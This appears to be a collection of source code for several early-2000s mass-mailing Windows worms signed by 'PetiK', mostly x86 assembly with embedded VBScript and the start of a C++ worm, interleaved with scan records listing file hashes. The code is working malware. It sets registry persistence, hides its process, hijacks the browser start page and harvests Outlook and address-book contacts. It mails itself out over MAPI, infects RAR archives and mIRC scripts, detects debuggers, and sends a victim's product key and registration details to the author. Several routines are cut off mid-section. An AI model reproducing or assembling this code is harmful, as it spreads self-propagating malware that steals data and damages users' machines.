push 00h
push offset octets
push TXTSIZE
push offset txtd
push [FileHdl]
callx WriteFile
push [FileHdl]
callx CloseHandle
vbs_file:
pushad
push 00h
push 80h
push 02h
push 00h
push 01h
push 40000000h
@pushsz "C:\rushhour.vbs"
callx CreateFileA
xchg edi,eax
push 00h
push offset octets
push VBSSIZE
push offset vbsd
push edi
callx WriteFile
push edi
callx CloseHandle
popad
push 1
@pushsz "wscript C:\rushhour.vbs"
callx WinExec
push 2000
callx Sleep
@pushsz "C:\rushhour.vbs"
callx DeleteFileA
call internet_page
start_scan:
mov edi,offset mailbook
push edi
push 50
push edi
callx GetWindowsDirectoryA
add edi,eax
mov eax,"iaM\"
stosd
mov eax,"ooBl"
stosd
mov eax,"xt.k"
stosd
mov ax,"t"
stosd
xor eax,eax
stosd
open_scan_file:
pushad
push 00h
push 80h
push 03h
push 00h
push 01h
push 80000000h
push offset mailbook
callx CreateFileA
inc eax
je not_exist
dec eax
xchg eax,ebx
xor eax,eax
push eax
push eax
push eax
push 2
push eax
push ebx
callx CreateFileMappingA
test eax,eax
je F1
xchg eax,ebp
xor eax,eax
push eax
push eax
push eax
push 4
push ebp
callx MapViewOfFile
test eax,eax
je F2
xchg eax,esi
push 0
push ebx
callx GetFileSize
cmp eax,3
jbe F3
scan_file:
xor edx,edx
mov edi,offset mail_addr
push edi
p_c: lodsb
cmp al," "
je car_s
cmp al,0dh
je entr1
cmp al,0ah
je entr2
cmp al,"#"
je f_mail
cmp al,"@"
jne not_a
inc edx
not_a: stosb
jmp p_c
car_s: inc esi
jmp p_c
entr1: xor al,al
stosb
pop edi
test edx,edx
je scan_file
call send_mail
jmp scan_file
entr2: xor al,al
stosb
pop edi
jmp scan_file
f_mail:
scan_window:mov counter,0
win1: inc counter
cmp counter,1000000
je end_w
@pushsz "Norton AntiVirus"
push 00h
callx FindWindowA
test eax,eax
jz win2
jmp change_nav
win2: @pushsz "System Properties"
push 00h
callx FindWindowA
test eax,eax
jz win3
jmp show_window
win3: @pushsz "Microsoft Home Page - Microsoft Internet Explorer"
push 00h
callx FindWindowA
test eax,eax
jz win1
jmp display_message
change_nav:
mov edi,eax
@pushsz "Norton Virus : W32.Norton.Worm@mm"
push edi
callx SetWindowTextA
jmp win1
show_window:
mov edi,eax
push 2
push edi
callx ShowWindow
jmp win1
display_message:
mov edi,eax
push 10h
@pushsz "Microsoft Internet Explorer"
@pushsz "You don't have access to this page"
push 00h
callx MessageBoxA
push 0
push edi
callx ShowWindow
jmp win1
end_w: push 00h
callx ExitProcess
hide_worm:
pushad
@pushsz "Kernel32.dll"
callx GetModuleHandleA
xchg eax,ecx
jecxz end_hide_worm
@pushsz "RegisterServiceProcess"
push ecx
callx GetProcAddress
xchg eax,ecx
jecxz end_hide_worm
push 1
push 0
call ecx
end_hide_worm:
popad
ret
internet_page:
pushad
call diff_val
db "Search Page",0
db "Start Page",0
db "Local Page",0
diff_val:
pop esi
push 3
pop ecx
page_loop:
push ecx
push 32
@pushsz "http://www.petik.fr.fm"
push 1
push esi
@pushsz "Software\Microsoft\Internet Explorer\Main"
push 80000001h
callx SHSetValueA
@endsz
pop ecx
loop page_loop
popad
ret
send_mail:
xor eax,eax
push eax
push eax
push offset Message
push eax
push [MAPIHdl]
callx MAPISendMail
ret
.data
; === copy_worm ===
orig_worm db 50 dup (0)
copy_worm db 50 dup (0)
Message dd ?
dd offset subject
dd offset body
dd ?
dd ?
dd ?
dd 2
dd offset MsgFrom
dd 1
dd offset MsgTo
dd 1
dd offset Attach
MsgFrom dd ?
dd namefrom
dd ?
dd ?
dd ?
MsgTo dd ?
dd 1
dd offset mail_addr
dd offset mail_addr
dd ?
dd ?
Attach dd ?
dd ?
dd ?
dd offset orig_worm
dd offset name_mail
dd ?
signature db "I-Worm.Rush",00h
origine db "A worm made in France",00h
author db "Written by PetiK - 2001",00h
end start
end
File Rush.exe received on 05.16.2009 19:29:11 (CET)
Additional information
File size: 5632 bytes
MD5...: 7b523f10e09815dd401a4db17a9813c5
SHA1..: b7f647c90aeb06ee2ce145c152d09bf67966559f
PEiD..: UPX 2.90 [LZMA] -> Markus Oberhumer, Laszlo Molnar & John Reiser
comment #
Name : I-Worm.Passion
Author : PetiK
Date : September 3rd - September 8th
Size : 5120 byte (compiled with UPX tool)
.586p
.model flat
.code
JUMPS
callx macro a
extrn a:proc
call a
endm
include useful.inc
include myinclude.inc
twin_worm:
push 50
mov esi,offset orig_worm
push esi
push 0
callx GetModuleFileNameA
reg_save:
push 8
push edi
push 1
@pushsz "MsVbdll"
@pushsz "Software\Microsoft\Windows\CurrentVersion\Run"
push 80000002h
callx SHSetValueA
check_connect:
push 0
push offset connected
callx InternetGetConnectedState
dec eax
jnz exec_other
system_counter:
callx GetTickCount
xor edx,edx
mov ecx,10
div ecx
cmp edx,2
jne check_connect
call change_page
chec_reg:
push offset regDisp
push offset regResu
push 0
push 0F003Fh
push 0
push 0
push 0
@pushsz "Software\[Check Passion]"
push 80000001h
callx RegCreateKeyExA
push [regResu]
callx RegCloseKey
cmp [regDisp],1
jne vbs_file
search_info:
push 50
push offset passion_txt
callx GetWindowsDirectoryA
@pushsz "\Passion.txt"
push offset passion_txt
callx lstrcat
call CreateDate
call CreateTime
push offset passion_txt
push offset date
@pushsz "Date"
@pushsz "Date et Heure"
callx WritePrivateProfileStringA
push offset passion_txt
push offset time
@pushsz "Heure"
@pushsz "Date et Heure"
callx WritePrivateProfileStringA
push 50
push offset Systemini
callx GetWindowsDirectoryA
@pushsz "\Win.ini"
push offset Systemini
callx lstrcat
push offset Systemini
push 20
push offset org_pays
push offset default
@pushsz "sCountry"
@pushsz "intl"
callx GetPrivateProfileStringA
push offset passion_txt
push offset org_pays
@pushsz "Pays"
@pushsz "Information systême"
callx WritePrivateProfileStringA
xor eax,eax
push eax
push eax
push offset Message2
push eax
push [hMapi]
callx MAPISendMail
vbs_file:
pushad
push 00h
push 80h
push 02h
push 00h
push 01h
push 40000000h
@pushsz "C:\passion.vbs"
callx CreateFileA
xchg edi,eax
push 0
push offset octets
push vbssize
push offset vbsd
push edi
callx WriteFile
push edi
callx CloseHandle
popad
push 1
@pushsz "wscript C:\passion.vbs"
callx WinExec
push 1000
callx Sleep
@pushsz "C:\passion.vbs"
callx DeleteFileA
start_scan:
mov edi,offset allmail
push edi
push 50
push edi
callx GetWindowsDirectoryA
add edi,eax
mov eax,"llA\"
stosd
mov eax,"liaM"
stosd
mov eax,"txt."
stosd
xor eax,eax
stosd
open_scan_mail:
pushad
push 00h
push 80h
push 03h
push 00h
push 01h
push 80000000h
push offset allmail
callx CreateFileA
inc eax
je end_spread
dec eax
xchg eax,ebx
xor eax,eax
push eax
push eax
push eax
push 2
push eax
push ebx
callx CreateFileMappingA
test eax,eax
je end_s1
xchg eax,ebp
xor eax,eax
push eax
push eax
push eax
push 4
push ebp
callx MapViewOfFile
test eax,eax
je end_s2
xchg eax,esi
push 0
push ebx
callx GetFileSize
cmp eax,3
jbe end_s3
scan_mail:
xor edx,edx
mov edi,offset mail_addr
push edi
p_c: lodsb
cmp al," "
je car_s
cmp al,0dh
je entr1
cmp al,0ah
je entr2
cmp al,"#"
je f_mail
cmp al,'@'
jne not_a
inc edx
not_a: stosb
jmp p_c
car_s: inc esi
jmp p_c
entr1: xor al,al
stosb
pop edi
test edx,edx
je scan_mail
call send_mail
jmp scan_mail
entr2: xor al,al
stosb
pop edi
jmp scan_mail
f_mail:
exec_other:
push 10000
callx Sleep
push 0
push offset copy_worm
callx WinExec
end_w: push 00h
callx ExitProcess
hide_worm:
pushad
@pushsz "Kernel32.dll"
callx GetModuleHandleA
xchg eax,ecx
jecxz end_hide_worm
@pushsz "RegisterServiceProcess"
push ecx
callx GetProcAddress
xchg eax,ecx
jecxz end_hide_worm
push 1
push 0
call ecx
end_hide_worm:
popad
ret
change_page:
pushad
call @value
db "Default_Page_URL",0
db "Search Page",0
db "Start Page",0
db "Local Page",0
@value: pop esi
push 4
pop ecx
p_loop:
push ecx
push 32
@pushsz "http://www.scody.net/ggdag/fra/testi/la_passion_orig.htm"
push 1
push esi
@pushsz "Software\Microsoft\Internet Explorer\Main"
push 80000001h
callx SHSetValueA
@endsz
pop ecx
loop p_loop
popad
ret
CreateDate Proc
pushad
mov edi,offset date
push 32
push edi
@pushsz "ddd, dd MMM yyyy"
push 0
push 0
push 9
callx GetDateFormatA
popad
ret
CreateDate EndP
CreateTime Proc
pushad
mov edi,offset time
push 32
push edi
@pushsz "HH:mm:ss"
push 0
push 0
push 9
callx GetTimeFormatA
popad
ret
CreateTime EndP
send_mail:
xor eax,eax
push eax
push eax
push offset Message
push eax
push [hMapi]
callx MAPISendMail
ret
.data
; === copy_worm ===
orig_worm db 50 dup (0)
copy_worm db 50 dup (0)
date db 17 dup (?)
time db 9 dup (?)
Message dd ?
dd offset subject
dd offset body
dd ?
dd ?
dd ?
dd 2
dd offset MsgFrom
dd 1
dd offset MsgTo
dd 1
dd offset Attach
Message2 dd ?
dd offset subject2
dd offset body2
dd ?
dd ?
dd ?
dd 2
dd offset MsgFrom
dd 1
dd offset MsgTo2
dd 1
dd offset Attach2
MsgFrom dd ?
dd ?
dd ?
dd ?
dd ?
MsgTo dd ?
dd 1
dd offset mail_addr
dd offset mail_addr
dd ?
dd ?
MsgTo2 dd ?
dd 1
dd ?
dd offset mail_me
dd ?
dd ?
Attach dd ?
dd ?
dd ?
dd offset orig_worm
dd offset name_mail
dd ?
Attach2 dd ?
dd ?
dd ?
dd offset passion_txt
dd ?
dd ?
vbsd: db 'On Error Resume Next',0dh,0ah
db 'Set rush=CreateObject("Outlook.Application")',0dh,0ah
db 'Set chan=rush.GetNameSpace("MAPI")',0dh,0ah
db 'Set fso=CreateObject("Scripting.FileSystemObject")',0dh,0ah
db 'Set txt=fso.CreateTextFile(fso.GetSpecialFolder(0)&"\AllMail.txt")',0dh,0ah
db 'txt.Close',0dh,0ah
db 'For Each M In chan.AddressLists',0dh,0ah
db 'If M.AddressEntries.Count <> 0 Then',0dh,0ah
db 'For O=1 To M.AddressEntries.Count',0dh,0ah
db 'Set P=M.AddressEntries(O)',0dh,0ah
db 'Set
txt=fso.OpenTextFile(fso.GetSpecialFolder(0)&"\AllMail.txt",8,true)',0dh,0ah
db 'txt.WriteLine P.Address',0dh,0ah
db 'txt.Close',0dh,0ah
db 'Next',0dh,0ah
db 'End If',0dh,0ah
db 'Next',0dh,0ah
db 'Set
txt=fso.OpenTextFile(fso.GetSpecialFolder(0)&"\AllMail.txt",8,true)',0dh,0ah
db 'txt.WriteLine "#"',0dh,0ah
db 'txt.Close',0dh,0ah
vbssize equ $-vbsd
signature db "I-Worm.Passion",00h
author db "Coded by PetiK - 2001",00h
end start
end
File Passion.exe received on 05.16.2009 19:28:44 (CET)
Additional information
File size: 5120 bytes
MD5...: 0a4e37025fec58713036fa88a28a070e
SHA1..: d85aa3be13c031e015b7378c7cb1951fb7ba2efa
PEiD..: UPX 2.90 [LZMA] -> Markus Oberhumer, Laszlo Molnar & John Reiser
comment #
Name : I-Worm.WTC (aka:I-Worm.Super -> It was the first worm's name.)
Author : PetiK
Date : September 11th (A great day that we don't forget all around the world) - October
11th
Size : 8704 byte (compiled with upx tool)
It creates C:\wrm.vbs. This file search and stocks all email in the WAB to the file
C:\email.mel. Wait 2 sec. and deletes the vbs file.
.586p
.model flat
.code
JUMPS
api macro a
extrn a:proc
call a
endm
include useful.inc
include myinclude.inc
twin_worm:
push 50
mov esi,offset orig_worm
push esi
push 0
api GetModuleFileNameA
push 0
push edi
push esi
api CopyFileA
push 15
push edi
push 1
@pushsz "Visual Debugger"
@pushsz "Software\Microsoft\Windows\CurrentVersion\Run"
push 80000002h
api SHSetValueA
special_folder:
pushad
push 0
push 5
push offset personal
push 0
api SHGetSpecialFolderPathA
push offset personal
api SetCurrentDirectoryA
call get_worm_crc
find_first_rar:
push offset Search
@pushsz "*.rar"
api FindFirstFileA
inc eax
je find_close_rar
dec eax
mov [hSearch],eax
i_r: call infect_rar
push offset Search
push [hSearch]
api FindNextFileA
test eax,eax
jne i_r
find_close_rar:
push [hSearch]
api FindClose
end_virtual:
push 8000h
push 0
push [worm_main]
api VirtualAlloc
end_all_rar:
popad
call vbs_file
push 2 or 20h
@pushsz "C:\email.mel"
api SetFileAttributesA
verif_inet:
push 0
push offset inet
api InternetGetConnectedState
dec eax
jnz verif_inet
open_scan_mail:
pushad
push 00h
push 80h
push 03h
push 00h
push 01h
push 80000000h
@pushsz "C:\email.mel"
api CreateFileA
inc eax
je end_spread
dec eax
xchg eax,ebx
xor eax,eax
push eax
push eax
push eax
push 2
push eax
push ebx
api CreateFileMappingA
test eax,eax
je end_s1
xchg eax,ebp
xor eax,eax
push eax
push eax
push eax
push 4
push ebp
api MapViewOfFile
test eax,eax
je end_s2
xchg eax,esi
push 0
push ebx
api GetFileSize
cmp eax,3
jbe end_s3
scan_mail:
xor edx,edx
mov edi,offset mail_addr
push edi
p_c: lodsb
cmp al," "
je car_s
cmp al,0dh
je entr1
cmp al,0ah
je entr2
cmp al,"%"
je f_mail
cmp al,'@'
jne not_a
inc edx
not_a: stosb
jmp p_c
car_s: inc esi
jmp p_c
entr1: xor al,al
stosb
pop edi
test edx,edx
je scan_mail
call send_mail
jmp scan_mail
entr2: xor al,al
stosb
pop edi
jmp scan_mail
f_mail:
start_page:
pushad
mov edi,offset sinet
call sinet_size
dd 160
sinet_size:
push edi
call reg
dd 1
reg:
@pushsz "Start Page"
@pushsz "Software\Microsoft\Internet Explorer\Main"
push 80000001h
api SHGetValueA
call @web
db "http://stcom.net/",0
db "http://stcom.net/default2.htm",0
db "http://stcom.net/qoqazfr",0
db "http://stcom.net/kavkoz",0
db "http://stcom.net/falestine",0
db "http://stcom.net/oulamah",0
db "http://stcom.net/Oulamah",0
db "http://stcom.net/An-Nissa",0
db "http://stcom.net/ahghanistan",0
db "http://www.alesteqlal.com/",0
@web:
pop esi
push 10
pop ecx
w_loop:
push ecx
push esi
push offset sinet
api lstrcmp
test eax,eax
jnz continue
call alert_fbi
jmp end_web
continue:
@endsz
pop ecx
loop w_loop
end_web:
popad
end_worm:
push 0
api ExitProcess
hide_worm:
pushad
@pushsz "Kernel32.dll"
api GetModuleHandleA
xchg eax,ecx
jecxz end_hide_worm
@pushsz "RegisterServiceProcess"
push ecx
api GetProcAddress
xchg eax,ecx
jecxz end_hide_worm
push 1
push 0
call ecx
end_hide_worm:
popad
ret
mess_worm:
pushad
push offset SystemTime
api GetSystemTime
cmp [SystemTime.wDay],04h
jne end_mess
push 40h
@pushsz "I-Worm.Super coded by PetiK"
call @txt
db "Because of the different terrorism acts in the USA",0dh,0ah
db "I don't will destroy your computer.",0dh,0ah,0dh,0ah
db "If you have some informations about the authors or Ben Laden,",0dh,0ah
db 9,"PLEASE CONTACT THE FBI",0
@txt:
push 0
api MessageBoxA
end_mess:
popad
ret
get_worm_crc Proc
pushad
push 0
push 80h
push 3
push 0
push 0
push 80000000h
push offset copy_worm
api CreateFileA
inc eax
je end_all_rar
dec eax
mov [hFile],eax
push 0
push eax
api GetFileSize
mov [filesize],eax
mov [RARCompressed],eax
mov [RAROriginal],eax
push eax
push 4
push 1000h or 2000h
push eax
push 0
api VirtualAlloc
test eax,eax
pop edx
je end_file
xchg eax,ebx
mov [worm_main],ebx
push edx
push 0
push offset tmp
push edx
push ebx
push [hFile]
api ReadFile
pop edi
mov esi,ebx
call CRC32
mov [RARCRC32],eax
end_file:
push [hFile]
api CloseHandle
popad
ret
get_worm_crc EndP
CRC32 Proc
push ecx
push edx
push ebx
xor ecx,ecx
dec ecx
mov edx,ecx
nxt_byte_crc:
xor eax,eax
xor ebx,ebx
lodsb
xor al,cl
mov cl,ch
mov ch,dl
mov dl,dh
mov dh,8
nxt_bit_crc:
shr bx,1
rcr ax,1
jnc no_crc
xor ax,08320h
xor bx,0EDB8h
no_crc: dec dh
jnz nxt_bit_crc
xor ecx,eax
xor edx,ebx
dec edi
jne nxt_byte_crc
not edx
not ecx
pop ebx
mov eax,edx
rol eax,16
mov ax,cx
pop edx
pop ecx
ret
CRC32 EndP
infect_rar Proc
pushad
push offset Search.cFileName
api GetFileAttributesA
cmp eax,1
je end_inf
push 0
push 80h
push 3
push 0
push 0
push 80000000h or 40000000h
push offset Search.cFileName
api CreateFileA
inc eax
je end_inf
dec eax
xchg eax,ebx
push 2
push 0
push 0
push ebx
api SetFilePointer
push 0
push offset tmp
push end_RAR-RARHeader
call end_RAR
RARHeader:
RARHeaderCRC dw 0
RARType db 74h
RARFlags dw 8000h
RARHSize dw end_RAR-RARHeader
RARCompressed dd 2000h
RAROriginal dd 2000h
RAROS db 0
RARCRC32 dd 0
RARFileDateTime dd 12345678h
RARNeedVer db 14h
RARMethod db 30h
RARFNameSize dw end_RAR-RARName
RARAttrib dd 0
RARName db 'SUPER.EXE'
end_RAR:push ebx
api WriteFile ;write the rar header
push 0
push offset tmp
push [filesize]
push [worm_main]
push ebx
api WriteFile ;write the worm
push ebx
api CloseHandle ;close the file
push 1
push offset Search.cFileName
api SetFileAttributesA ;set already-infected mark
end_inf:popad
ret
infect_rar EndP
vbs_file Proc
pushad
push 00h
push 80h
push 02h
push 00h
push 01h
push 40000000h
@pushsz "C:\wrm.vbs"
api CreateFileA
xchg eax,ebx
push 0
call @tmp
dd ?
@tmp:
push e_vbs - s_vbs
call e_vbs
s_vbs: db 'On Error Resume Next',CRLF
db 'Set f=CreateObject("Scripting.FileSystemObject")',CRLF
db 'Set O=CreateObject("Outlook.Application")',CRLF
db 'Set M=O.GetNameSpace("MAPI")',CRLF
db 'Set mel=f.CreateTextFile("C:\email.mel")',CRLF
db 'mel.Close',CRLF
db 'For Each N In M.AddressLists',CRLF
db 'If N.AddressEntries.Count <> 0 Then',CRLF
db 'For c=1 To N.AddressEntries.Count',CRLF
db 'Set P=N.AddressEntries(c)',CRLF
db 'Set mel=f.OpenTextFile("C:\email.mel",8,true)',CRLF
db 'mel.WriteLine P.Address',CRLF
db 'mel.Close',CRLF
db 'Next',CRLF
db 'End If',CRLF
db 'Next',CRLF
db 'Set mel=f.OpenTextFile("C:\email.mel",8,true)',CRLF
db 'mel.WriteLine "%"',CRLF
db 'mel.Close',CRLF
e_vbs: push ebx
api WriteFile
push ebx
api CloseHandle
push 1
@pushsz "wscript C:\wrm.vbs"
api WinExec
push 5000
api Sleep
@pushsz "C:\wrm.vbs"
api DeleteFileA
popad
ret
vbs_file EndP
send_mail:
xor eax,eax
push eax
push eax
push offset MsgWrm
push eax
push [hMAPI]
api MAPISendMail
ret
alert_fbi:
@pushsz "C:\information.txt"
push offset sinet
@pushsz "Start Page of MSIE"
@pushsz "Information about the suspect written by the Worm"
api WritePrivateProfileStringA
push 50
push offset Systemini
api GetWindowsDirectoryA
@pushsz "\Win.ini"
push offset Systemini
api lstrcat
push offset Systemini
push 20
push offset org_pays
push offset default
@pushsz "sCountry"
@pushsz "intl"
api GetPrivateProfileStringA
@pushsz "C:\information.txt"
push offset org_pays
@pushsz "Country of the suspect"
@pushsz "Information about the suspect written by the Worm"
api WritePrivateProfileStringA
xor eax,eax
push eax
push eax
push offset MsgFbi
push eax
push [hMAPI]
api MAPISendMail
push 30000
api Sleep
@pushsz "C:\information.txt"
api DeleteFileA
ret
.data
; === copy_worm ===
orig_worm db 50 dup (0)
copy_worm db 50 dup (0)
rar_worm db 50 dup (0)
MsgFbi dd ?
dd offset subjectfbi
dd offset bodyfbi
dd ?
dd ?
dd ?
dd 2
dd offset MsgFrom
dd 1
dd offset MsgToFbi
dd 1
dd offset AttachFbi
MsgFrom dd ?
dd ?
dd ?
dd ?
dd ?
dd ?
MsgToFbi dd ?
dd 1
dd ?
dd offset mailfbi
dd ?
dd ?
AttachFbi dd ?
dd ?
dd ?
dd offset infofbi
dd ?
dd ?
MsgWrm dd ?
dd offset subjectwrm
dd offset bodywrm
dd ?
dd ?
dd ?
dd 2
dd offset MsgFrom
dd 1
dd offset MsgToWrm
dd 1
dd offset AttachWrm
MsgToWrm dd ?
dd 1
dd ?
dd offset mail_addr
dd ?
dd ?
AttachWrm dd ?
dd ?
dd ?
dd offset orig_worm
dd offset name_mail
dd ?
signature db "I-Worm.WTC",00h
author db "Coded by PetiK - 2001",00h
end start
end
SUPER.VBS
On Error Resume Next
Set ws=CreateObject("WScript.Shell")
verif=ws.RegRead("HKLM\Software\Microsoft\SuperWorm\")
If verif <> "send" Then
ro1=ws.RegRead("HKLM\Software\Microsoft\Windows\CurrentVersion\RegisteredOwner")
ro2=ws.RegRead("HKLM\Software\Microsoft\Windows\CurrentVersion\RegisteredOrganization")
pk=ws.RegRead("HKLM\Software\Microsoft\Windows\CurrentVersion\ProductKey")
pi=ws.RegRead("HKLM\Software\Microsoft\Windows\CurrentVersion\ProductId")
ver=ws.RegRead("HKLM\Software\Microsoft\Windows\CurrentVersion\Version")
vern=ws.RegRead("HKLM\Software\Microsoft\Windows\CurrentVersion\VersionNumber")
sp=ws.RegRead("HKCU\Software\Microsoft\Internet Explorer\Main\Start Page")
ld=ws.RegRead("HKCU\Software\Microsoft\Internet Explorer\International\AcceptLanguage")
Set OA=CreateObject("Outlook.Application")
Set EM=OA.CreateItem(0)
EM.To="petik@multimania.com"
EM.BCC = "support@microsoft.com; support@avx.com; nimda-request@sophos.com"
EM.Subject="I am infected by I-Worm.Super !!"
body="My name is " & ro1 & ","
body = body & VbCrLf & "I was infected by I-Worm.Super :-("
body = body & VbCrLf & "It was on "& date & " at " & time & "."
body = body & VbCrLf & ""
body = body & VbCrLf & "If you want some informations about me :"
body = body & VbCrLf & "My registered owner : " & ro1
body = body & VbCrLf & "My registered organization : " & ro2
body = body & VbCrLf & "My Product Key : " & pk
body = body & VbCrLf & "My Product Indentification : " & pi
body = body & VbCrLf & "My version of Windows : " & ver & " " & vern
body = body & VbCrLf & "My start page of MSIE : " & sp
body = body & VbCrLf & "My country : " & ld
body = body & VbCrLf & ""
body = body & VbCrLf & "Please help me !"
body = body & VbCrLf & "Thank you very much."
EM.Body=body
EM.DeleteAfterSubmit=True
EM.Send
ws.RegWrite "HKLM\Software\Microsoft\SuperWorm\","send"
End If
File WTC.exe received on 05.16.2009 20:03:13 (CET)
Additional information
File size: 8704 bytes
MD5...: 2fb45484acdd0ec3a4f7f199b13e2262
SHA1..: 657559e72ba0fb47cbe296be5f8c8d01c1164636
PEiD..: UPX 2.90 [LZMA] -> Markus Oberhumer, Laszlo Molnar & John Reiser
comment #
Name : I-Worm.Anthrax (aka : I-Worm.Fi)
Author : PetiK
Date : October 11th - November 6th
Size : 6144 byte (compiled with UPX tool)
-C:\mirc
-C:\mirc32
-C:\progra~1\mirc
-C:\progra~1\mirc32
To spread, it uses MAPI mechanism with 10 first email found in the WAB.
.586p
.model flat
.code
JUMPS
api macro a
extrn a:proc
call a
endm
include useful.inc
include myinclude.inc
start:
twin_worm:
push 50
mov esi,offset orig_worm
push esi
push 0
api GetModuleFileNameA ; esi = name of file
push 1
push edi
push esi
api CopyFileA ; copy itself
test eax,eax
je end_twin ; already copy ??
push 20
push edi
push 1
@pushsz "Microsoft System"
@pushsz "Software\Microsoft\Windows\CurrentVersion\Run"
push 80000002h
api SHSetValueA ; regedit
call debug
e_sr:
call hide_worm
call create_url
call spread_mirc
verif_inet:
push 0
push offset inet
api InternetGetConnectedState
dec eax
jnz verif_inet
spread_wab:
pushad
srch_wab:
mov edi,offset wab_path
push offset wab_size
push edi
push offset reg
push 0
@pushsz "Software\Microsoft\Wab\WAB4\Wab File Name" ; The name of WAB file
push 80000001h
api SHGetValueA
push 0
push 0
push 3
push 0
push 1
push 80000000h
push offset wab_path
api CreateFileA
inc eax
je end_srch_wab
dec eax
xchg ebx,eax
push 0
push 0
push 0
push 2
push 0
push ebx
api CreateFileMappingA
test eax,eax
je end_wab1
xchg eax,ebp
push 0
push 0
push 0
push 4
push ebp
api MapViewOfFile
test eax,eax
je end_wab2
xchg eax,esi
mov verif,0
d_scan_mail:
call @smtp
db 'SMTP',00h,1Eh,10h,56h,3Ah ; the string what we want to find
@smtp:
pop edi
s_scan_mail:
pushad
push 9
pop ecx
rep cmpsb
popad
je scan_mail
inc esi
loop s_scan_mail
end_wab3:
push esi
api UnmapViewOfFile
end_wab2:
push ebp
api CloseHandle
end_wab1:
push ebx
api CloseHandle
end_srch_wab:
popad
end_worm:
push 0
api ExitProcess
push 0
push 80h
push 3
push 0
push 0
push 40000000h or 80000000h
@pushsz "\\.\SICE" ; SOFTICE driver win98
api CreateFileA
inc eax
jne kill
push 0
push 80h
push 3
push 0
push 0
push 40000000h or 80000000h
@pushsz "\\.\NTICE" ; SOFTICE driver winNT/2k
api CreateFileA
inc eax
jne kill
popad
ret
debug EndP
hide_worm Proc
pushad
@pushsz "KERNEL32.dll"
api GetModuleHandleA
xchg eax,ecx
jecxz end_hide_worm
@pushsz "RegisterServiceProcess" ; Registered as Service Process
push ecx
api GetProcAddress
xchg eax,ecx
jecxz end_hide_worm
push 1
push 0
call ecx
end_hide_worm:
popad
ret
hide_worm EndP
spread_mirc Proc
push 50
push offset mircspread
api GetSystemDirectoryA
@pushsz "\MsSys32.exe"
push offset mircspread
api lstrcat
pushad
call @mirc
db 'C:\mirc\script.ini',0
db 'C:\mirc32\script.ini',0 ; spread with mIRC. Thanx to Microsoft.
db 'C:\progra~1\mirc\script.ini',0
db 'C:\progra~1\mirc32\script.ini',0
@mirc:
pop esi
push 4
pop ecx
mirc_loop:
push ecx
push 0
push 80h
push 2
push 0
push 1
push 40000000h
push esi
api CreateFileA
mov [hmirc],eax
push 0
push offset byte_write
@tmp_mirc:
push e_mirc - s_mirc
push offset s_mirc
push [hmirc]
api WriteFile
push [hmirc]
api CloseHandle
@endsz
pop ecx
loop mirc_loop
end_spread_mirc:
popad
ret
spread_mirc EndP
scan_mail:
xor edx,edx
add esi,21
mov edi,offset mail_addr
push edi
p_c: lodsb
cmp al," "
je car_s
cmp al,00h
je f_mail
cmp al,"@"
jne not_a
inc edx
not_a: stosb
jmp p_c
car_s: inc esi
jmp p_c
f_mail: xor al,al
stosb
pop edi
test edx,edx
je d_scan_mail
call send_mail
cmp verif,10
je end_worm
jmp d_scan_mail
send_mail:
inc verif
pushad
@pushsz "MAPI32.DLL"
api LoadLibraryA
xchg ebx,eax
mapi macro x
push offset sz&x
push ebx
api GetProcAddress
mov x,eax
endm
mapi MAPILogon
mapi MAPISendMail
mapi MAPILogoff
mapi_logon:
xor eax,eax
push offset hMAPI
push eax
push eax
push eax
push eax
push eax
call MAPILogon
test eax,eax
jne end_send_mail
mapi_send_mail:
xor eax,eax
push eax
push eax
push offset MsgWrm
push eax
push [hMAPI]
call MAPISendMail
mapi_logoff:
xor eax,eax
push eax
push eax
push eax
push [hMAPI]
call MAPILogoff
push ebx
api FreeLibrary
end_send_mail:
popad
ret
.data
; === copy_worm ===
orig_worm db 50 dup (0)
copy_worm db 50 dup (0)
MAPISendMail dd ?
MAPILogon dd ?
MAPILogoff dd ?
hMAPI dd 0
MsgWrm dd ?
dd offset subjectwrm
dd offset bodywrm
dd ?
dd ?
dd ?
dd 2
dd offset MsgFrom
dd 1
dd offset MsgToWrm
dd 1
dd offset AttachWrm
MsgFrom dd ?
dd 1
dd offset MsgFrom
dd offset mail_from
dd ?
dd ?
MsgToWrm dd ?
dd 1
dd ?
dd offset mail_addr
dd ?
dd ?
AttachWrm dd ?
dd ?
dd ?
dd offset orig_worm
dd offset name_mail
dd ?
end start
end
File Anthrax.exe received on 05.16.2009 10:44:20 (CET)
Additional information
File size: 6144 bytes
MD5...: 0c6cd035d3c5b84b13d1f54d70bf5fb3
SHA1..: 80bd3e0ec9c6ab27997d7e55d4b0094ebeea26c9
SHA256: 36ee4e185c6b791ae8d38118bd0e00ae3c2135c1bfcd7f3452165a18c96283dc
PEiD..: UPX 2.90 [LZMA] -> Markus Oberhumer, Laszlo Molnar & John Reiser
/*
Name of worm : W32.HLLW.Last
Author : PetiK
Size : 28672 byte
Date : 10/12/2001
Comment : My very first (and last) worm coded in C++ (compiled with Borland).
Why this name ? I decided to stop to code worms and virus. During one year I
learnt many things about worms and virii and I thanks all poeple who helped
me.
*/
#include <stdio.h>
#include <windows.h>
#include <mapi.h>
#include <tlhelp32.h>
#pragma argsused//ne pas générer de fichier listing de compilation
char filename[100];
char windir[100], windr[100];
HKEY hReg;
FILE *htm;
HANDLE infhtm,lSnapshot,myproc;
HWND NAVh;
BOOL rProcessFound;
LPSTR Run = "Software\\Microsoft\\Windows\\CurrentVersion\\Run";
LHANDLE session;
MapiMessage *mess;
HINSTANCE hMAPI;
char messId[512],mname[50],maddr[30];
unsigned long count=0;
BYTE done[50];
DWORD siz=sizeof(done);
DWORD type=REG_SZ;
LPSTR Persona=".DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Shell
Folders";
SYSTEMTIME syst;
PROCESSENTRY32 uProcess;
WIN32_FIND_DATA ffile;
char *sujet[]={
"New Game for You.",
"Protect your computer against VBS/Worm and VBS/Virus",
"Free Flash Application !",
"Internet Explorer 5.0/6.0 Patch",
"Try WinXP.",
"Free Chat",
};
char *corps[]={
"Hi,\n\nTake a look at this new game found on the web.",
"This tool allows you to protect your computer against the VBS worm/virus.",
"Hi,\n\nVery good application make with Flash 5.",
"There is the last patch for Internet Explorer against the ActiveX's bugs.",
"Run this small program to see a demo of Win XP.",
"Hello,\n\nVery cool program to chat on the net.",
};
char *attachfile[]={
"New_Game.exe",
"Fix_VBSWormVirus.exe",
"Flash_EXE.exe",
"IEPatch.exe",
"Demo_WinXP.exe",
"FreeChat.exe",
};
char *text[]={
"This file is not a Win32 file valid",
